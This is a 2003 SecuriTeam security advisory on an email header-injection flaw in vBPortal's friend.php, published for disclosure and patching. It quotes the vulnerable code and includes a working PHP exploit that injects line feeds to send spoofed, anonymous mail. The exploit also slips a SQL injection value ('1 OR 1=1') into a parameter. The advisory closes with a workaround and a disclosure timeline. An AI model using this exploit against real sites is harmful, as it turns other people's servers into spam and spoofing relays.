[UNIX] Anonymous Mail Forwarding Vulnerabilities in vBPortal

From: SecuriTeam (support_at_securiteam.com)
Date: 11/26/03

  • Next message: SecuriTeam: "[NEWS] Thomson TCM315 Denial of Service (Long GET Request)" 
    To: list@securiteam.com
Date: 26 Nov 2003 14:54:34 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Anonymous Mail Forwarding Vulnerabilities in vBPortal
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.vbportal.com> vBPortal is "a add-on to the already popular
    message board software called vB. vBPortal has came a long way, and the
    new version 3.0 has a lot of great features and functions. Integrating
    phpnuke's functions and abilities to easily add modules and add-ons has
    added greater abilities. Simply it adds a frontpage and utilizes vB's
    abilities and expands on that".

    A vulnerability has been discovered in the friend.php file that allows
    unauthorized users to send SPAM (junk mail) anonymously.

    DETAILS

    Vulnerable systems:
     * vbPortal version 2.0 alpha 8.1

    Immune systems:
     * vbPortal version 3.0b

    Vulnerable code:
    <?

    [...]
    function SendStory($sid, $yname, $ymail, $fname, $fmail) {
       global $sitename, $nukeurl, $prefix;

       $result2=mysql_query("select title, time, topic from
    $prefix"._stories." where sid=$sid");
       list($title, $time, $topic) = mysql_fetch_row($result2);

       $result3=mysql_query("select topictext from $prefix"._topics." where
    topicid=$topic");
       list($topictext) = mysql_fetch_row($result3);

       $subject = ""._INTERESTING." $sitename";
       $message = ""._HELLO." $fname:\n\n"._YOURFRIEND." $yname
    "._CONSIDERED."\n\n\n$title\n("._FDATE." $time)\n"._FTOPIC."
    $topictext\n\n"._URL.": $nukeurl/article.php?sid=$sid\n\n"._YOUCANREAD."
    $sitename\n$nukeurl";
       mail($fmail, $subject, $message, "From: \"$yname\" <$ymail>\nX-Mailer:
    PHP/" . phpversion());
       $title = urlencode($title);
       $fname = urlencode($fname);
       Header("Location: friend.php?op=StorySent&title=$title&fname=$fname");
    }
    [...]
    function SendSite($yname, $ymail, $fname, $fmail) {
       global $sitename, $slogan, $nukeurl;
       $subject = ""._INTSITE." $sitename";
       $message = ""._HELLO." $fname:\n\n"._YOURFRIEND." $yname "._OURSITE."
    $sitename "._INTSENT."\n\n\n"._FSITENAME."
    $sitename\n$slogan\n"._FSITEURL." $nukeurl\n";
       mail($fmail, $subject, $message, "From: \"$yname\" <$ymail>\nX-Mailer:
    PHP/" . phpversion());
       Header("Location: friend.php?op=SiteSent&fname=$fname");
    }
    [...]
    switch($op) {
       case "SendStory":
       SendStory($sid, $yname, $ymail, $fname, $fmail);
       break;
    [...]
       case "SendSite":
       SendSite($yname, $ymail, $fname, $fmail);
       break;
    [...]

    }
    ?>

    Both functions SendStory () and SendSite () send emails. Two variables
    (yname and ymail) are modifiable in the headers. This means that an
    attacker can inject what he wishes, by using the character LF (line feed),
    %0A in ASCII.

    Exploits:
    Anonymous Mail Forwarding:
    Here is an example of a simple application that changes the mail via
    variables ymail and fname.

    The exploit allows us to choose the sender, the name of the sender, the
    addressee, type of the message, message, subject, and having the choice
    between both vulnerable functions.

    <?
    if (!isset($Send)){
    ?>

    <form action="<? echo $PHP_SELF; ?>">
    URL : <input type="text" name="url"><br>
     From : <input type="text" name="from"><br>
    Your Name : <input type="text" name="yname"><br>
    To : <input type="text" name="fmail"><br>
    Content Type : <input type="text" name="contenttype"
    value="text/plain"><br> Subject To Add : <input type="text"
    name="newsubject"><br> Op. : <br> <input type="radio" checked name="op"
    value="SendSite">SendSite<br> <input type="radio" name="op"
    value="SendStory">SendStory<br> Message : <br><br><textarea name="message"
    rows="6" cols="50"></textarea> <br><br><input type="submit" name="Send"
    value="Verify"> </form>

    <?
    }else{

    echo "URL : ".$url."<br>";
    echo "From: ".$from."<br>";
    echo "Your Name: ".$yname."<br>";
    echo "To: ".$fmail."<br>";
    echo "Content Type: ".$contenttype."<br>";
    echo "Added Subject: ".$newsubject."<br>";
    echo "Message : <br><br>".str_replace("\n","<br>",$message);

    if ($op=="SendStory"){ $sid="1%20OR%201=1"; }

    $ymail=$from.">%0A";
    $ymail.="Subject:".$newsubject."%0A";
    $ymail.="Content-Type:multipart/mixed;%20boundary=Anonymous;";
    $ymail.="%0A%0A%0A";
    $fname="%0A--Anonymous%0A"; $fname.="Content-Type:".$contenttype."%0A%0A";
    $fname.=str_replace("\n","%0A",$message);
    $fname.="%0A%0A%0A";
    $fname.="--Anonymous--";
    $fname.="%0A%0A%0A";

    $url.="/friend.php?sid=".$sid."&op=".$op."&yname=".$yname."&ymail=".$ymail."
    &fmail=".$fmail."&fname=".$fname;

    echo "<br><br><b><a href=\"$url\">Ok, Mail It</a></b>";
    }
    ?>

    Let us remind that the user chosen in the request of this exploit will
    also receive a copy of the mail, this is because an addressee was already
    defined prior to our additional addressee.

    Solution:
    You can find a patch at the following link: <http://www.phpsecure.info>
    http://www.phpsecure.info

    Workaround:
    For version 2.0 alpha 8.1 simply add the following line in friend.php file
    just before the "switch($op) {" :
     ------SNIP-------

    if (eregi("\n",$yname) OR eregi("\n",$ymail) OR eregi("\r",$yname) OR
    eregi("\r",$ymail)){ die("Patched"); }

     ------SNIP-------

    Disclosure timeline:
    12/11/2003 Vulnerability discovered
    12/11/2003 Vendor notified
    12/11/2003 Vendor response
    13/11/2003 Security Corporation clients notified
    13/11/2003 Started e-mail discussions
    21/11/2003 Last e-mail received
    22/11/2003 Public disclosure

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:advisory@security-corporation.com> Security Corporation Security
    Advisory.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Thomson TCM315 Denial of Service (Long GET Request)"

    Relevant Pages